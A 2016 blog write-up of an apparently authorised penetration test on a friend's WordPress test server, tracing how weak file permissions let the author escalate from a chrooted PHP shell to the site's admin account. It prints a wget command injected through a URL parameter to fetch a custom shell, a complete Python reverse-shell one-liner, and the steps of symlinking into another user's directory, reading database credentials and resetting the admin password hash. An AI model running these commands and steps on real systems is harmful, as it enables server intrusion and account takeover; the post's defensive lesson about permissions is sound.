DZONERZY

When permission goes wild

September 26, 2016 Daniele

WordPress Penetration Test

Today a friend of mine told me:

I don't know how it is possible, i've a fully patched wordpress site without a particular or malicious plugin, but someone keep hacking me over and over!

Since he's a friend of mine I told him to let me take a look, so i'll try to figure out what goes wrong with the server setup! He was happy enough to find the root cause of so many breaches so he gave me access to their test server with a limited account and a php shell (Take in mind php was chrooted!).

It all started with a php shell

It all started with a php shell as shown below

Image description

I was able to execute command with a normal php shell, but i preferred to use one of mines. So i downloaded it using wget on server, using the commands below

http://test.server.************.it/?0=wget%20http://*************/myne.txt
http://test.server.************.it/?0=mv%20myne.txt%20m.php

This is my favorite shell, easy to use with a lot of built-in tools and user friendly!

Image description

At this point I started looking around without any success, since php was chrooted and I wasn't able to browse to other user's directory, but I suddenly noticed that python was installed! Python might come in handy when you need to bypass chroot since many sysadmin forget to remove it. So using a simple python reverse shel,l i was able to spawn a TTY shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Image description

As you may notice from the screenshot above using the python shell, I was able to browse the root directory, and i found an interesting folder belonging to a different user, so I decided to elevate my privileges to the one belonging to our target! In order to do this we would need to read some files hosted from our target such as configuration files or similiar, so I tried to symlink to the user's directory and due to weak permissions it was possible! Using the access to our target's main directory, I noticed many files but just few were accessible. The one that caught my attention was the backups folders (owned by root), this folder was supposed to contain backups from the site, so since I was looking for a configuration file that was the best place to start.

Image description

Once inside the backups folder I noticed a folder called .git so it took me few seconds to figure out that it was a repository. I started cloning it and once it was finished, I noticed many php files from a wordpress installation. Since I cloned the repository I had full read / write access over these files, so with a simple cat I took DB user and password from the configuration file and I tried to login using MySQL

Image description

Once i got in, I had the confirmation that it was a WordPress installation so started looking around in order to find wp_users table. When i found it, I replaced the admin password with the md5 of "hacked"...

Image description

After this process was done, I tried to login on site and .......BOOM I was in, mission accomplished!

Image description

No magic at all

There's no magic at all behind this hack. Wrong permissions may lead to serious troubles... Even when you use protections such as chroot or similar, with today's techniques they can be easly bypassed. That said, you shouldn't rely just on prevent the user from using some tools with higher permission. Linux or Windows provides the sysadmins with some powerful weapons called ACL and Permission, nerver forget about it.

The End

I hope you liked this small write-up, comment if you liked it.

#dzonerzy